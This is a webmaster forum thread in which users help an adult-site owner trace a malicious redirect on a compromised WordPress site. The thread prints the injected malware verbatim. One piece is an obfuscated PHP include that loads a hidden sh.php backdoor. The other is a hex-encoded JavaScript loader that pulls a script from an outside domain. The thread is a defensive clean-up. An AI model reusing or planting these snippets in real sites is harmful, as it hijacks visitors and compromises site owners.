Redirection issue
Hello, I hope someone here will help me. Today I was informed that there is redirection on my biggest site, but of course as usual I don't see anything from my computer and from proxies I tried, so I don't know what causes it. I have advertisement only from companies I always trusted, nastydollar and sextracker moneytree, there is also one trade script and that should be pretty much everything so I don't know where the redirection comes from and how long it hurts my site... Thanks for any help, the site is teen-porn-tube.com
|
This is what I found: Code:
01:47:03.040 0.376 829 275 GET 302 Redirect to: http://c4tracking01.com/aff/ep.php?act=200116:us-c&prog=1&site=90&skin=c4 http://speedclicks.ero-advertising.com/speedclicks/out.php?1=1&doc=IGVgu3Dty6GSAostqr8L2K4uQpGGG9kJqxw9NpiIUiRJTrqiDDR7dkadq3aCRibVgzMuMMTEaqRcdBHFUlYQV7PvWYodvBzt5kXjywSpa7HMidHXObQUYCj5dpH0TiRI&pid=29455&spaceid=134377&returnurl=http%3A%2F%2Fwww.adscampaign.com%2Fbanners.html&rcheck=MTMyMzg5NTA3Mg== |
Ok thank you, but I still do not know how to figure out what is causing it from this piece of code, but at least I see it is really true
|
If I were to hack a WP site, I would insert js in the header with an exploit, most likely in a template file. Check one of these from your header:
teen-porn-tube.com/wp-content/themes/WPTube3/js/jquery-1.3.2.min.js teen-porn-tube.com/wp-content/themes/WPTube3/js/jqueryslidemenu/jqueryslidemenu.js |
went to your site via google search
after the page loaded I got redirected here: http://17.uso2.com/ edit/ now the browser that i left open in the background on your site is constantly bouncing between your page, a redirection page, and the target page (every 3 seconds) LOL |
Also, maybe check wp-content/themes/theme-name/header.php and see if there is anything different there than what you see in your source. Usually malicious redirects are js that look like gibberish
Also, is that last line of js after html tag supposed to be there?.. |
I don't know any slider I use on my so I just deleted them, but they looked alright, the file had exact size as original and so...
|
I see some strange piece of code right in the top of header.php so i put it away, is it still redirecting?
|
It doesn't redirect for me anymore so I hope that fixed your problem :)
|
Ok good so it was probably this code? I'm not sure, what can I do to protect the site and other wordpress sites from this happening again?
Code:
<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?><?php @ini_set('display_errors', 0); @error_reporting(0); $type = 'ob'; $sysadux = base64_decode('L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1sL3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMvY2xlYXJsb29rczIvaW1nL3NoLnBocA=='); @include_once $sysadux;?><?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?> |
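Added example, not part of the original thread: a Python sketch that takes the header.php snippet posted above, decodes the base64 string to show which file the snippet actually includes, and strips the marker-delimited block from the template text. The function name `analyze_php` and the stand-in template are assumptions made for this illustration.

```python
import base64
import re

# Shape seen in the thread: two identical 32-hex-digit marker comments
# wrapping PHP that include()s a base64-encoded path.
MARKED_BLOCK = re.compile(
    r"<\?/\*(?P<marker>[0-9a-f]{32})\*/\?>(?P<body>.*?)<\?/\*(?P=marker)\*/\?>",
    re.DOTALL,
)
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

# Injected line as posted above, followed by a constructed stand-in template.
MARKER = "<?/*f3e2b9a4f7c710c8c040b0c7bca6681c*/?>"
INJECTED = (
    MARKER + "<?php @ini_set('display_errors', 0); @error_reporting(0); "
    "$type = 'ob'; $sysadux = base64_decode('"
    "L2hvbWUvY2hlenp5L2RvbWFpbnMvdGVlbi1wb3JuLXR1YmUuY29tL3B1YmxpY19odG1s"
    "L3dwLWluY2x1ZGVzL2pzL3RpbnltY2UvcGx1Z2lucy9pbmxpbmVwb3B1cHMvc2tpbnMv"
    "Y2xlYXJsb29rczIvaW1nL3NoLnBocA=="
    "'); @include_once $sysadux;?>" + MARKER
)
TEMPLATE = "<!DOCTYPE html>\n<html><head><title>constructed</title></head>\n"


def analyze_php(source):
    """Return (findings, cleaned_source) for the text of one PHP file."""
    findings = []
    for block in MARKED_BLOCK.finditer(source):
        includes = []
        for b64 in B64_CALL.findall(block.group("body")):
            try:
                raw = base64.b64decode(b64, validate=True)
                includes.append(raw.decode("utf-8", "replace"))
            except ValueError:  # binascii.Error is a ValueError subclass
                includes.append("<undecodable>")
        findings.append({"marker": block.group("marker"), "includes": includes})
    # Dropping the whole marked block leaves the legitimate template text.
    return findings, MARKED_BLOCK.sub("", source)


if __name__ == "__main__":
    found, cleaned = analyze_php(INJECTED + TEMPLATE)
    print(found)
    print(cleaned == TEMPLATE)
```

The decoded path is a separate file on the server, so removing the block from header.php leaves that file in place; it has to be located and dealt with as well.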
And change your passwords :) |
Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script> |
Yeah that injected script has been a problem with Wordpress in the past - but it's really because we're dumbasses and don't update and don't change passwords every now and then.
I don't know what your FTP client is Chezter but it probably uses a simple xml file to cache your log in to your server. Delete that cache or file or just blank the log-in fields out if you don't change your FTP password - it can be during uploads that the injector writes itself into your files/templates, or by accessing your wordpress templates as admin - and it propagates it to every page throughout your site. To get rid of this one you're going to have to call your hosting tech support and tell them about the exploit. Before you call them, change your FTP password, change your Wordpress Password (change your admin username if you know how, "admin" default is just a security risk too), and let them know that you did. And don't try to change anything (add a new post, FTP something to the server) until the tech department wipes it out. When it happened to me I just called the hosting company and tech support had it taken out in a couple thousand pages in less than two minutes. Oh, and update your version of wordpress. |
line 586 index.html
<!-- /wrapper --> </body> </html> <script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script> |
It is the same code, just it was not only in header but it is in footer, index, links... everywhere
|
"Funny" is it is also in other domains on the same ftp account, just everywhere and it is there for 11 months :) that's crazy, I would like to know how I could never see it in any site...
|
Ok my hosting support told me they deleted all the bad code from my webs, so I need for the last time to know if the sites are still redirecting or not. Thanks again all of you who helped me with this.
|
it tried to hijack my browser.....i viewed source and this was still at the bottom Code:
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766173637269707427207372633d27687474703a2f2f7777772e636c617961696d2e636f6d2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);</script> |
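Added example, not part of the original thread: a Python sketch that walks a web root, finds quoted hex strings that decode to printable markup (the trick the script above uses), reports whether they sit after the closing `</html>` tag, and lists the script URL they load. The function names and the two-file demo site are constructed for this illustration; the hex string is the one posted in the thread.

```python
import os
import re
import tempfile

HEX_STRING = re.compile(r"""["']((?:[0-9a-fA-F]{2}){20,})["']""")
SRC_ATTR = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
CLOSE_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
# Hex string copied from the script posted in this thread.
THREAD_HEX = ("3c736372697074206c616e67756167653d276a617661736372697074"
              "27207372633d27687474703a2f2f7777772e636c617961696d2e636f6d"
              "2f696e6465782e7068703f7265663d7765626578273e3c2f7363726970743e")

def inspect_text(text):
    """Return one finding per quoted hex string that decodes to printable ASCII."""
    ends = [m.end() for m in CLOSE_HTML.finditer(text)]
    findings = []
    for m in HEX_STRING.finditer(text):
        decoded = bytes.fromhex(m.group(1)).decode("latin-1")
        # Hashes and ids rarely decode to printable ASCII; encoded markup does.
        if decoded.isascii() and decoded.isprintable():
            findings.append({
                "after_html_close": bool(ends) and m.start() > ends[-1],
                "script_src": SRC_ATTR.findall(decoded),
                "decoded": decoded,
            })
    return findings

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk root and map each affected file path to its findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    found = inspect_text(fh.read())
                if found:
                    hits[path] = found
    return hits

def demo():
    """Scan a constructed site: one clean page, one with the loader appended."""
    clean = "<html><body>ok</body></html>\n"
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "clean.html"), "w") as fh:
            fh.write(clean)
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write(clean + '<script>var x="' + THREAD_HEX + '";</script>')
        return {os.path.basename(p): f for p, f in scan_tree(root).items()}
```

Running `scan_tree` against every document root on the account gives the list of files that still carry the loader, which is the check that viewing one page's source cannot give.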
check the version of your FTP program -- is it up to date?
there was a problem like this a while back with old Filezilla apps -- maybe related |
I use total commander 7.04 and it is probably not up to date
|
Reinstalled wordpress, reinstalled template, used new total commander, deleted everything I could so if it's still there then I'm really fucked....
|
I know I'm annoying, but is it still redirecting or not?
|